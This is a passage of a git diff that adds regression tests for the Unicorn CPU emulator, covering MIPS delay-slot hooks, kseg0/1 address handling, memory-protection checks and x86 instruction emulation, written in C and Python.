UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); + if( val != 0 ) + test1_delayslot_executed = true; + + + // write test2 code to be emulated to memory + test_num = 2; + printf("\nuc_mem_write(2)\n"); + err = uc_mem_write(uc, addr, test_code_2, sizeof(test_code_2)); + if( err ) + { + printf("Failed on uc_mem_write() with error returned: %u\n", err); + return err; + } + // start executing test code 2 + printf("uc_emu_start(2)\n"); + uc_emu_start(uc, addr, addr+sizeof(test_code_2), 0, 0); + // read the value from a0 when finished executing + uc_reg_read(uc, UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); + if( val != 0 ) + test2_delayslot_executed = true; + + + // free resources + printf("\nuc_close()\n"); + uc_close(uc); + + + // print test results + printf("\n\nTest 1 SHOULD execute the delay slot instruction:\n"); + printf(" Emulator %s execute the delay slot: %s\n", + test1_delayslot_executed ? "did" : "did not", + test1_delayslot_executed ? "CORRECT" : "WRONG"); + printf(" Emulator %s hook the delay slot: %s\n", + test1_delayslot_hooked ? "did" : "did not", + test1_delayslot_hooked ? "CORRECT" : "WRONG"); + + printf("\n\nTest 2 SHOULD NOT execute the delay slot instruction:\n"); + printf(" Emulator %s execute the delay slot: %s\n", + test2_delayslot_executed ? "did" : "did not", + !test2_delayslot_executed ? "CORRECT" : "WRONG"); + printf(" Emulator %s hook the delay slot: %s\n", + test2_delayslot_hooked ? "did" : "did not", + !test2_delayslot_hooked ? "CORRECT" : "WRONG"); + + + // test 1 SHOULD execute the instruction in the delay slot + if( test1_delayslot_hooked == true && test1_delayslot_executed == true ) + printf("\n\nTEST 1 PASSED!\n"); + else + printf("\n\nTEST 1 FAILED!\n"); + + // test 2 SHOULD NOT execute the instruction in the delay slot + if( test2_delayslot_hooked == false && test2_delayslot_executed == false ) + printf("TEST 2 PASSED!\n\n"); + else + printf("TEST 2 FAILED!\n\n"); + + + // dynamically free shared library +#ifdef DYNLOAD + uc_dyn_free(); +#endif + + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_delay_slot_code_hook.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_delay_slot_code_hook.c new file mode 100644 index 0000000..4a407ae --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_delay_slot_code_hook.c @@ -0,0 +1,138 @@ +/* +Test for code hook being called for instructions in branch delay slot in MIPS cpu. +See issue https://github.com/unicorn-engine/unicorn/issues/290 + +The code hook should be called for every instruction executed. +This test checks that the code hook is correctly called for instructions in branch delay slots. +In this test the loop check value is decremented inside the branch delay shot. +This helps to show that the instruction in the branch delay slot is being executed, +but that the code hook is just not occurring. +*/ + +// windows specific +#ifdef _MSC_VER +#include +#include +#define PRIx64 "llX" +#ifdef DYNLOAD +#include +#else // DYNLOAD +#include +#ifdef _WIN64 +#pragma comment(lib, "unicorn_staload64.lib") +#else // _WIN64 +#pragma comment(lib, "unicorn_staload.lib") +#endif // _WIN64 +#endif // DYNLOAD + +// posix specific +#else // _MSC_VER +#include +#endif // _MSC_VER + +// common includes +#include + + +// Test MIPS little endian code. +// It should loop 3 times before ending. +const uint64_t addr = 0x100000; +const unsigned char loop_test_code[] = { + 0x02,0x00,0x04,0x24, // 100000: li $a0, 2 + // loop1 + 0x00,0x00,0x00,0x00, // 100004: nop + 0xFE,0xFF,0x80,0x14, // 100008: bnez $a0, loop1 + 0xFF,0xFF,0x84,0x24, // 10000C: addiu $a0, -1 +}; +bool test_passed_ok = false; +int loop_count = 0; + + +static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + if( address == 0x10000C ) + test_passed_ok = true; + if( address == 0x100004 ) + { + printf("\nloop %d:\n", loop_count); + loop_count++; + } + printf("Code: %"PRIx64"\n", address); +} + + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_err err; + uc_hook hhc; + uint32_t val; + + // dynamically load shared library +#ifdef DYNLOAD + uc_dyn_load(NULL, 0); +#endif + + // Initialize emulator in MIPS 32bit little endian mode + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); + if (err) + { + printf("Failed on uc_open() with error returned: %u\n", err); + return err; + } + + // map in a page of mem + err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); + if (err) + { + printf("Failed on uc_mem_map() with error returned: %u\n", err); + return err; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, addr, loop_test_code, sizeof(loop_test_code)); + if( err ) + { + printf("Failed on uc_mem_write() with error returned: %u\n", err); + return err; + } + + // hook all instructions by having @begin > @end + uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); + if( err ) + { + printf("Failed on uc_hook_add(code) with error returned: %u\n", err); + return err; + } + + // execute code + printf("---- Executing Code ----\n"); + err = uc_emu_start(uc, addr, addr + sizeof(loop_test_code), 0, 0); + if (err) + { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + return err; + } + + // done executing, print some reg values as a test + printf("---- Execution Complete ----\n\n"); + uc_reg_read(uc, UC_MIPS_REG_PC, &val); printf("pc is %X\n", val); + uc_reg_read(uc, UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); + + // free resources + uc_close(uc); + + if( test_passed_ok ) + printf("\n\nTEST PASSED!\n\n"); + else + printf("\n\nTEST FAILED!\n\n"); + + // dynamically free shared library +#ifdef DYNLOAD + uc_dyn_free(); +#endif + + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_except.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_except.py new file mode 100644 index 0000000..b400efe --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_except.py @@ -0,0 +1,41 @@ +#!/usr/bin/python +from unicorn import * +from unicorn.mips_const import * + +import regress + +def hook_intr(uc, intno, _): + print 'interrupt', intno + +CODE = 0x400000 +asm = '0000a48f'.decode('hex') # lw $a0, ($sp) + +class MipsExcept(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) + uc.hook_add(UC_HOOK_INTR, hook_intr) + uc.mem_map(CODE, 0x1000) + uc.mem_write(CODE, asm) + + with self.assertRaises(UcError) as m: + uc.reg_write(UC_MIPS_REG_SP, 0x400001) + uc.emu_start(CODE, CODE + len(asm), 300) + + self.assertEqual(UC_ERR_READ_UNALIGNED, m.exception.errno) + + with self.assertRaises(UcError) as m: + uc.reg_write(UC_MIPS_REG_SP, 0xFFFFFFF0) + uc.emu_start(CODE, CODE + len(asm), 200) + + self.assertEqual(UC_ERR_READ_UNMAPPED, m.exception.errno) + + with self.assertRaises(UcError) as m: + uc.reg_write(UC_MIPS_REG_SP, 0x80000000) + uc.emu_start(CODE, CODE + len(asm), 100) + + self.assertEqual(UC_ERR_READ_UNMAPPED, m.exception.errno) + +if __name__ == '__main__': + regress.main() + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_invalid_read_of_size_4_when_tracing.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_invalid_read_of_size_4_when_tracing.c new file mode 100644 index 0000000..013016e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_invalid_read_of_size_4_when_tracing.c @@ -0,0 +1,33 @@ +#include + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("tracing\n"); +} + +#define HARDWARE_ARCHITECTURE UC_ARCH_MIPS +#define HARDWARE_MODE UC_MODE_MIPS32 + +#define MEMORY_STARTING_ADDRESS 0x1000000 +#define MEMORY_SIZE 2 * 1024 * 1024 +#define MEMORY_PERMISSIONS UC_PROT_ALL + +#define BINARY_CODE "00000000000000000000000000AA" + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + 1); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kernel_mmu.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kernel_mmu.py new file mode 100644 index 0000000..51602fa --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kernel_mmu.py @@ -0,0 +1,24 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.mips_const import * + +import regress + +class MipsSyscall(regress.RegressTest): + def test(self): + addr = 0x80000000 + code = '34213456'.decode('hex') # ori $at, $at, 0x3456 + + uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN) + uc.mem_map(addr, 0x1000) + uc.mem_write(addr, code) + uc.reg_write(UC_MIPS_REG_AT, 0) + + uc.emu_start(addr, addr + len(code)) + + self.assertEqual(uc.reg_read(UC_MIPS_REG_AT), 0x3456) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kseg0_1.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kseg0_1.c new file mode 100644 index 0000000..be47bf5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kseg0_1.c @@ -0,0 +1,75 @@ +#include +#include +#include +#include + +// Test for the MIPS kseg0 and kseg1 memory segments. +// See issue https://github.com/unicorn-engine/unicorn/issues/217 +// The kseg0 address range 0x80000000-0x9FFFFFFF is not mapped through the MMU, +// but instead is directly translated to low ram by masking off the high address bit. +// Similarly, the address range kseg1 0xA00000000-0xBFFFFFF is translated directly to +// low ram by masking off the top 3 address bits. +// Qemu handles these address ranges correctly, but there are issues with the way Unicorn checks for +// a valid memory mapping when executing code in the kseg0 or kseg1 memory range. +// In particular, Unicorn checks for a valid mapping using the virtual address when executing from kseg0/1, +// when it should probably use the real address in low ram. + +#define KSEG0_VIRT_ADDRESS 0x80001000 //Virtual address in kseg0, mapped by processor (and QEMU) to 0x1000 +#define KSEG1_VIRT_ADDRESS 0xA0001000 //Virtual address in kseg1, mapped by processor (and QEMU) to 0x1000 +#define KSEG0_1_REAL_ADDRESS 0x1000 //Real address corresponding to the above addresses in kseg0/1 + +#define MIPS_CODE_EL "\x56\x34\x21\x34" // ori $at, $at, 0x3456; + +int main() +{ + + uc_engine *uc; + uc_err err; + + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); + if (err) { + printf("uc_open %d\n", err); + return 1; + } + + // map 4Kb memory for this emulation, into the real address space + err = uc_mem_map(uc, KSEG0_1_REAL_ADDRESS, 4 * 1024, UC_PROT_ALL); + if (err) { + printf("uc_mem_map %d\n", err); + return 1; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, KSEG0_1_REAL_ADDRESS, MIPS_CODE_EL, sizeof(MIPS_CODE_EL) - 1); + if (err) { + printf("uc_mem_map %s\n", uc_strerror(err)); + return 1; + } + + //Start emulation at real address, this currently succeeds + err = uc_emu_start(uc, KSEG0_1_REAL_ADDRESS, KSEG0_1_REAL_ADDRESS + 4, 0, 0); + if (err) { + printf("uc_emu_start at real address: %s\n", uc_strerror(err)); + return 1; + } + + //Start emulation at virtual address in kseg0, this cuurently fails + err = uc_emu_start(uc, KSEG0_VIRT_ADDRESS, KSEG0_VIRT_ADDRESS + 4, 0, 0); + if (err) { + printf("uc_emu_start at kseg0 address: %s\n", uc_strerror(err)); + return 1; + } + + //Start emulation at virtual address in kseg1, this currently fails + err = uc_emu_start(uc, KSEG1_VIRT_ADDRESS, KSEG1_VIRT_ADDRESS + 4, 0, 0); + if (err) { + printf("uc_emu_start at kseg1 address: %s\n", uc_strerror(err)); + return 1; + } + + uc_close(uc); + + printf("Good, this bug is fixed!\n"); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_single_step_sp.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_single_step_sp.py new file mode 100644 index 0000000..b3c7840 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_single_step_sp.py @@ -0,0 +1,51 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.mips_const import * + +import regress + +def code_hook(uc, addr, size, user_data): + print 'code hook: pc=%08x sp=%08x' % (addr, uc.reg_read(UC_MIPS_REG_SP)) + +def run(step=False): + addr = 0x4010dc + + code = ( + 'f8ff0124' # addiu $at, $zero, -8 + '24e8a103' # and $sp, $sp, $at + '09f82003' # jalr $t9 + 'e8ffbd23' # addi $sp, $sp, -0x18 + 'b8ffbd27' # addiu $sp, $sp, -0x48 + '00000000' # nop + ).decode('hex') + + uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) + if step: + uc.hook_add(UC_HOOK_CODE, code_hook) + + uc.reg_write(UC_MIPS_REG_SP, 0x60800000) + uc.reg_write(UC_MIPS_REG_T9, addr + len(code) - 8) + + print 'sp =', hex(uc.reg_read(UC_MIPS_REG_SP)) + print 'at =', hex(uc.reg_read(UC_MIPS_REG_AT)) + print ' (single step: %s)' % (str(step)) + + uc.mem_map(addr & ~(0x1000 - 1), 0x2000) + uc.mem_write(addr, code) + uc.emu_start(addr, addr + len(code)) + + print 'sp =', hex(uc.reg_read(UC_MIPS_REG_SP)) + print 'at =', hex(uc.reg_read(UC_MIPS_REG_AT)) + print + return uc.reg_read(UC_MIPS_REG_SP) + + +class MipsSingleStep(regress.RegressTest): + def test(self): + sp1 = run(step=False) + sp2 = run(step=True) + self.assertEqual(sp1, sp2) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_syscall_pc.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_syscall_pc.py new file mode 100644 index 0000000..995b154 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_syscall_pc.py @@ -0,0 +1,27 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.mips_const import * + +import regress + +def intr_hook(uc, intno, data): + print 'interrupt=%d, v0=%d, pc=0x%08x' % (intno, uc.reg_read(UC_MIPS_REG_V0), uc.reg_read(UC_MIPS_REG_PC)) + +class MipsSyscall(regress.RegressTest): + def test(self): + addr = 0x40000 + code = '0c000000'.decode('hex') # syscall + + uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) + uc.mem_map(addr, 0x1000) + uc.mem_write(addr, code) + uc.reg_write(UC_MIPS_REG_V0, 100) + uc.hook_add(UC_HOOK_INTR, intr_hook) + + uc.emu_start(addr, addr+len(code)) + self.assertEqual(0x40004, uc.reg_read(UC_MIPS_REG_PC)) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mov_gs_eax.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mov_gs_eax.py new file mode 100644 index 0000000..fe381eb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mov_gs_eax.py @@ -0,0 +1,24 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.x86_const import * + +import regress + +class VldrPcInsn(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_X86, UC_MODE_32) + uc.mem_map(0x1000, 0x1000) + # mov gs, eax; mov eax, 1 + code = '8ee8b801000000'.decode('hex') + uc.mem_write(0x1000, code) + uc.reg_write(UC_X86_REG_EAX, 0xFFFFFFFF) + + with self.assertRaises(UcError) as ex_ctx: + uc.emu_start(0x1000, 0x1000 + len(code)) + + self.assertEquals(ex_ctx.exception.errno, UC_ERR_EXCEPTION) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/movsd.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/movsd.py new file mode 100644 index 0000000..2876613 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/movsd.py @@ -0,0 +1,35 @@ +#!/usr/bin/python +# By Ryan Hileman, issue #3 + +from capstone import * +from unicorn import * +from unicorn.x86_const import * + +import regress +code = 'f20f1005aa120000'.decode('hex') + +def dis(mem, addr): + md = Cs(CS_ARCH_X86, CS_MODE_64) + return '\n'.join([ + '%s %s' % (i.mnemonic, i.op_str) + for i in md.disasm(str(mem), addr) + ]) + +def hook_code(uc, addr, size, user_data): + mem = uc.mem_read(addr, size) + print 'instruction size:', size + print 'instruction:', str(mem).encode('hex'), dis(mem, addr) + print 'reference: ', code.encode('hex'), dis(code, addr) + +class Movsd(regress.RegressTest): + + def runTest(self): + addr = 0x400000 + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.hook_add(UC_HOOK_CODE, hook_code) + mu.mem_map(addr, 8 * 1024 * 1024) + mu.mem_write(addr, code) + mu.emu_start(addr, addr + len(code)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/nr_mem_test.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/nr_mem_test.c new file mode 100644 index 0000000..34a8814 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/nr_mem_test.c @@ -0,0 +1,108 @@ +/* +Non-readable memory test case + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +#include + +#include + +const uint8_t PROGRAM[] = + "\x8b\x1d\x00\x00\x30\x00\xa1\x00\x00\x40\x00"; +// total size: 11 bytes + +/* +bits 32 + + mov ebx, [0x300000] + mov eax, [0x400000] +*/ + +// callback for tracing memory access (READ or WRITE) +static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data) +{ + + switch(type) { + default: + // return false to indicate we want to stop emulation + return false; + case UC_MEM_READ_PROT: + printf(">>> non-readable memory is being read at 0x%"PRIx64 ", data size = %u\n", + address, size); + return false; + } +} + + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_hook trace1; + uc_err err; + uint32_t eax, ebx; + + printf("Memory protections test\n"); + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err) { + printf("Failed on uc_open() with error returned: %u\n", err); + return 1; + } + + uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_READ); + uc_mem_map(uc, 0x300000, 0x1000, UC_PROT_READ | UC_PROT_WRITE); + uc_mem_map(uc, 0x400000, 0x1000, UC_PROT_WRITE); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, 0x100000, PROGRAM, sizeof(PROGRAM))) { + printf("Failed to write emulation code to memory, quit!\n"); + return 2; + } else { + printf("Allowed to write to read only memory via uc_mem_write\n"); + } + + uc_mem_write(uc, 0x300000, (const uint8_t*)"\x41\x41\x41\x41", 4); + uc_mem_write(uc, 0x400000, (const uint8_t*)"\x42\x42\x42\x42", 4); + + //uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 0x400000, 0x400fff); + + // intercept invalid memory events + uc_hook_add(uc, &trace1, UC_MEM_READ_PROT, hook_mem_invalid, NULL, 1, 0); + + // emulate machine code in infinite time + printf("BEGIN execution\n"); + err = uc_emu_start(uc, 0x100000, 0x100000 + sizeof(PROGRAM), 0, 2); + if (err) { + printf("Expected failure on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } else { + printf("UNEXPECTED uc_emu_start returned UC_ERR_OK\n"); + } + printf("END execution\n"); + + uc_reg_read(uc, UC_X86_REG_EAX, &eax); + printf("Final eax = 0x%x\n", eax); + uc_reg_read(uc, UC_X86_REG_EBX, &ebx); + printf("Final ebx = 0x%x\n", ebx); + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/osx_qemu_thread_create_crash.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/osx_qemu_thread_create_crash.py new file mode 100644 index 0000000..b34b319 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/osx_qemu_thread_create_crash.py @@ -0,0 +1,20 @@ +#!/usr/bin/env python + +import platform +import resource + +from unicorn import * + +import regress + +# OS X: OK with 2047 iterations. +# OS X: Crashes at 2048:th iteration ("qemu: qemu_thread_create: Resource temporarily unavailable"). +# Linux: No crashes observed. +class ThreadCreateCrash(regress.RegressTest): + def test(self): + for i in xrange(2048): + Uc(UC_ARCH_X86, UC_MODE_64) + self.assertTrue(True, "If not reached, then we have a crashing bug.") + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/potential_memory_leak.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/potential_memory_leak.py new file mode 100644 index 0000000..29a2998 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/potential_memory_leak.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +import platform +import resource + +from unicorn import * + +import regress + +class MemoryLeak(regress.RegressTest): + def test(self): + if platform.system() == "Darwin": + rusage_multiplier = 1 + elif platform.system() == "Linux": + rusage_multiplier = 1024 + else: + # resource.getrusage(...) is platform dependent. Only tested under OS X and Linux. + return + max_rss_before = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * rusage_multiplier + for i in xrange(10000): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.mem_map(0, 4096) + mu.emu_start(0, 0) + max_rss_after = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * rusage_multiplier + rss_increase_per_iteration = (max_rss_after - max_rss_before) / i + self.assertLess(rss_increase_per_iteration, 8000) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/pshufb.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/pshufb.py new file mode 100644 index 0000000..4e60b7d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/pshufb.py @@ -0,0 +1,21 @@ +#!/usr/bin/python +# By Ryan Hileman, issue #91 + +# Invalid instruction = test failed + +from unicorn import * +from unicorn.x86_const import * + +import regress + +class Pshufb(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_X86, UC_MODE_64) + uc.mem_map(0x2000, 0x1000) + # pshufb xmm0, xmm1 + uc.mem_write(0x2000, '660f3800c1'.decode('hex')) + uc.emu_start(0x2000, 0x2005) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/reg_write_sign_extension.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/reg_write_sign_extension.py new file mode 100644 index 0000000..b7d3be5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/reg_write_sign_extension.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +"""See https://github.com/unicorn-engine/unicorn/issues/98""" + +import unicorn +import regress + +ADDR = 0xffaabbcc + +def hook_mem_invalid(mu, access, address, size, value, user_data): + print ">>> Access type: %u, expected value: 0x%x, actual value: 0x%x" % (access, ADDR, address) + assert(address == ADDR) + mu.mem_map(address & 0xfffff000, 4 * 1024) + mu.mem_write(address, b'\xcc') + return True + +class RegWriteSignExt(regress.RegressTest): + + def runTest(self): + mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) + mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, ADDR) + + mu.mem_map(0x10000000, 1024 * 4) + # jmp ebx + mu.mem_write(0x10000000, b'\xff\xe3') + + mu.hook_add(unicorn.UC_HOOK_MEM_FETCH_UNMAPPED | unicorn.UC_HOOK_MEM_FETCH_PROT, hook_mem_invalid) + mu.emu_start(0x10000000, 0x10000000 + 2, count=1) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.py new file mode 100644 index 0000000..2e4f253 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.py @@ -0,0 +1,34 @@ +#!/usr/bin/python + +import unittest + +from os.path import dirname, basename, isfile +import glob + +# Find all unittest type in this directory and run it. + +class RegressTest(unittest.TestCase): + pass + +def main(): + unittest.main() + +if __name__ == '__main__': + directory = dirname(__file__) + if directory == '': + directory = '.' + modules = glob.glob(directory+"/*.py") + __all__ = [ basename(f)[:-3] for f in modules if isfile(f)] + suite = unittest.TestSuite() + + for module in __all__: + m = __import__(module) + for cl in dir(m): + try: + realcl = getattr(m,cl) + if issubclass(realcl, unittest.TestCase): + suite.addTest(realcl()) + except Exception as e: + pass + + unittest.TextTestRunner().run(suite) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.sh b/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.sh new file mode 100644 index 0000000..0c05699 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.sh @@ -0,0 +1,22 @@ +#!/bin/sh + + +./map_crash +./map_write +./sigill +./sigill2 +./block_test +./ro_mem_test +./nr_mem_test +./timeout_segfault +./rep_movsb +./mem_unmap +./mem_protect +./mem_exec +./mem_map_large +./00opcode_uc_crash +./eflags_noset +./eflags_nosync +./mips_kseg0_1 +./mem_double_unmap + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_hook.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_hook.py new file mode 100644 index 0000000..493c0d1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_hook.py @@ -0,0 +1,30 @@ +#!/usr/bin/python +from unicorn import * +from unicorn.x86_const import * +import regress + +PAGE_SIZE = 4 * 1024 + +CODE = b'\xf3\xaa' # rep stosb + + +def hook_code(uc, addr, size, user_data): + print("hook called at %x" %addr) + +class REP(regress.RegressTest): + + def test_rep(self): + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + mu.mem_map(0, PAGE_SIZE) + mu.mem_write(0, CODE) + mu.reg_write(UC_X86_REG_ECX, 3) + mu.reg_write(UC_X86_REG_EDI, 0x100) + mu.hook_add(UC_HOOK_CODE, hook_code) + + mu.emu_start(0, len(CODE)) + self.assertEqual(0, mu.reg_read(UC_X86_REG_ECX)) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_movsb.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_movsb.c new file mode 100644 index 0000000..436a02b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_movsb.c @@ -0,0 +1,182 @@ +/* + +rep movsb regression + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +#define __STDC_FORMAT_MACROS +#include +#include +#include +#include + +#include + +unsigned char PROGRAM[] = + "\xbe\x00\x00\x20\x00\xbf\x00\x10\x20\x00\xb9\x14\x00\x00\x00\xf3" + "\xa4\xf4"; +// total size: 18 bytes + +/* +bits 32 + +; assumes code section at 0x100000 r-x +; assumes data section at 0x200000-0x202000, rw- + +mov esi, 0x200000 +mov edi, 0x201000 +mov ecx, 20 +rep movsb +hlt +*/ + +static int log_num = 1; + +// callback for tracing instruction +static void hook_code(uc_engine *uc, uint64_t addr, uint32_t size, void *user_data) +{ + uint8_t opcode; + if (uc_mem_read(uc, addr, &opcode, 1) != UC_ERR_OK) { + printf("not ok %d - uc_mem_read fail during hook_code callback, addr: 0x%" PRIx64 "\n", log_num++, addr); + _exit(-1); + } + switch (opcode) { + case 0xf4: //hlt + printf("# Handling HLT\n"); + if (uc_emu_stop(uc) != UC_ERR_OK) { + printf("not ok %d - uc_emu_stop fail during hook_code callback, addr: 0x%" PRIx64 "\n", log_num++, addr); + _exit(-1); + } + else { + printf("ok %d - hlt encountered, uc_emu_stop called\n", log_num++); + } + break; + default: //all others + break; + } +} + +// callback for tracing memory access (READ or WRITE) +static void hook_mem_write(uc_engine *uc, uc_mem_type type, + uint64_t addr, int size, int64_t value, void *user_data) +{ + printf("# write to memory at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", addr, size, value); + if (addr < 0x201000L) { + //this is actually a read, we don't write in this range + printf("not ok %d - write hook called for read of 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", log_num++, addr, size, value); + } + else { + printf("ok %d - write hook called for write of 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", 